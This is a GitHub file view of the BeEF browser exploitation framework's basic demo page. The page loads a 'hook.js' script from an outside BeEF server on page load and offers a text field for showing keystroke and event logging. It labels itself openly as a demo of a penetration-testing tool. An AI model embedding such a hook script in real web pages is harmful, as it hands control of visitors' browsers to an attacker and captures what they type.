-
Notifications
You must be signed in to change notification settings - Fork 90
/
beef.html
38 lines (30 loc) · 1.13 KB
/
beef.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<!--
Copyright (c) 2006-2015 Wade Alcorn - [email protected]
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<head>
<title>BeEF Basic Demo</title>
<script src="http://SKS_3:80/hook.js">
</script>
</head>
<body>
You should be hooked into <b>BeEF</b>.
<p>
Have fun while your browser is working against you.
</p>
These links are for demonstrating the "Get Page HREFs" command module<br />
<ul>
<li><a href="http://beefproject.com" target="_blank">The Browser Exploitation Framework Project homepage</a>
<li><a href="http://ha.ckers.org/" target="_blank">ha.ckers.org homepage</a>
<li><a href="http://slashdot.org/" target="_blank">Slashdot</a>
</ul>
<p>Have a go at the event logger.<br />
<label for="imptxt">Insert your secret here:</label> <input type="text" id="imptxt" name="Important Text" /></p>
<p>
You can also load up a more advanced demo page <a href="butcher/index.html">here</a>
</p>
</body>
</html>